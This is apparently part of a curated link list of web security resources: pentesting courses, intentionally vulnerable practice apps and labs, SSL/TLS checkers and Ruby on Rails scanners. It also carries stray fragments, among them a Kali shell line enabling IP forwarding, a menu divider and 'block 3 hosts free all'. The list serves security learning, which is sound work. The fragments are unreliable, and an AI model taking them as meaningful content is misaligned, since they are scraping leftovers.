- https://pwn.guide/ - Cybersecurity learning platform, with about 100 tutorials, approximately 25 of them are about web hacking & defending websites.
- https://www.offensive-security.com/information-security-training/advanced-web-attack-and-exploitation/ Offensive Security Advanced Web Attacks and Exploitation (live)
- https://www.sans.org/course/web-app-penetration-testing-ethical-hacking Sans SEC542: Web App Penetration Testing and Ethical Hacking
- https://www.sans.org/course/advanced-web-app-penetration-testing-ethical-hacking Sans SEC642: Advanced Web App Penetration Testing and Ethical Hacking
- http://opensecuritytraining.info/ - Open Security Training
- http://securitytrainings.net/security-trainings/ - Security Exploded Training
- http://www.securitytube.net/ - World’s largest Infosec and Hacking Portal.
- https://www.hacker101.com/ - Free class for web security by Hackerone
- https://www.darkrelay.com/courses/professional-penetration-tester - Zero-Hero style Pentesting course by DarkRelay Security Labs
- http://testasp.vulnweb.com/ - Acunetix ASP test and demonstration site
- http://testaspnet.vulnweb.com/ - Acunetix ASP.Net test and demonstration site
- http://testphp.vulnweb.com/ - Acunetix PHP test and demonstration site
- http://crackme.cenzic.com/kelev/view/home.php - Crack Me Bank
- http://zero.webappsecurity.com/ - Zero Bank
- http://demo.testfire.net/ - Altoro Mutual
- https://public-firing-range.appspot.com/ - Firing Range is a test bed for automated web application security scanners.
- https://xss-game.appspot.com/ - XSS challenge
- https://google-gruyere.appspot.com/ Google Gruyere, web application exploits and defenses
- https://ginandjuice.shop/catalog
- https://pentest-ground.com/ Pentest-Ground is a free playground with deliberately vulnerable web applications and network services.
- HackSimulator is a GPT created by MarkCyber in which chatGPT 4 acts as a hacking CTF. This GPT will ask for your experience level and what you would like to improve on, before simulating a machine/application for you to hack into, using the chatbox as the place to input terminal commands. Since this is through AI, it changes and adjust based on your experience level and you can ask for help if you are stuck.
- https://portswigger.net/web-security - Web Security Academy: Free Online Training from PortSwigger
- http://www.cis.syr.edu/~wedu/seed/all_labs.html - Developing Instructional Laboratories for Computer SEcurity EDucation
- https://www.vulnhub.com/ - Virtual Machines for Localhost Penetration Testing.
- https://pentesterlab.com/ - PentesterLab is an easy and great way to learn penetration testing.
- https://github.com/jerryhoff/WebGoat.NET - This web application is a learning platform about common web security flaws.
- http://www.dvwa.co.uk/ - Damn Vulnerable Web Application (DVWA)
- http://sourceforge.net/projects/lampsecurity/ - LAMPSecurity Training
- https://github.com/Audi-1/sqli-labs - SQLI labs to test error based, Blind boolean based, Time based.
- https://github.com/paralax/lfi-labs - small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
- https://hack.me/ - Build, host and share vulnerable web apps in a sandboxed environment for free
- http://azcwr.org/az-cyber-warfare-ranges - Free live fire Capture the Flag, blue team, red team Cyber Warfare Range for beginners through advanced users. Must use a cell phone to send a text message requesting access to the range.
- https://github.com/adamdoupe/WackoPicko - WackoPicko is a vulnerable web application used to test web application vulnerability scanners.
- https://github.com/rapid7/hackazon - Hackazon is a free, vulnerable test site that is an online storefront built with the same technologies used in today’s rich client and mobile applications.
- https://github.com/RhinoSecurityLabs/cloudgoat - Rhino Security Labs' "Vulnerable by Design" AWS infrastructure setup tool
- https://www.hackthebox.eu/ - Hack The Box is an online platform allowing you to test and advance your skills in cyber security.
- https://github.com/tegal1337/0l4bs - 0l4bs is a Cross-site scripting labs for web application security enthusiasts.
- https://github.com/oliverwiegers/pentest_lab - Local pentest lab leveraging docker compose.
- https://ginandjuice.shop/catalog
- https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application
- https://labex.io/skilltrees/cybersecurity - LabEx is an online platform for enhancing your cyber security skills through hands-on labs.
- https://pythoncyber.go.ro - CyberPython helps you to make your own research in order to solve challenges, exploit CVEs and make good scripts.
└─$ sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
- https://www.ssllabs.com/ssltest/index.html - This service performs a deep analysis of the configuration of any SSL web server on the public Internet.
- http://certdb.com/ - SSL/TLS data provider service. Collect the data about digital certificates - issuers, organisation, whois, expiration dates, etc... Plus, has handy filters for convenience.
- https://raymii.org/s/tutorials/Strong_SSL_Security_On_nginx.html - Strong SSL Security on nginx
- https://weakdh.org/ - Weak Diffie-Hellman and the Logjam Attack
- https://letsencrypt.org/ - Let’s Encrypt is a new Certificate Authority: It’s free, automated, and open.
- https://filippo.io/Heartbleed/ - A checker (site and tool) for CVE-2014-0160 (Heartbleed).
- https://testssl.sh/ - A command line tool which checks a website's TLS/SSL ciphers, protocols and cryptographic flaws.
- http://brakemanscanner.org/ - A static analysis security vulnerability scanner for Ruby on Rails applications.
- https://github.com/rubysec/ruby-advisory-db - A database of vulnerable Ruby Gems
- https://github.com/rubysec/bundler-audit - Patch-level verification for Bundler
- https://github.com/hakirisec/hakiri_toolbelt - Hakiri Toolbelt is a command line interface for the Hakiri platform.
- https://hakiri.io/facets - Scan Gemfile.lock for vulnerabilities.
- http://rails-sqli.org/ - This page lists many query methods and options in ActiveRecord which do not sanitize raw SQL arguments and are not intended to be called with unsafe user input.
- https://github.com/0xsauby/yasuo - A ruby script that scans for vulnerable & exploitable 3rd-party web applications on a network
---------------------------------------------------MISC - ADDING BINARY KALI-MENU---------------------------------
- Config
- Documentation
- Tools
- Cheat Sheets
- Docker
- Vulnerabilities
- Courses
- Online Hacking Demonstration Sites
- Labs
- Security Ruby on Rails
block 3 hosts free all
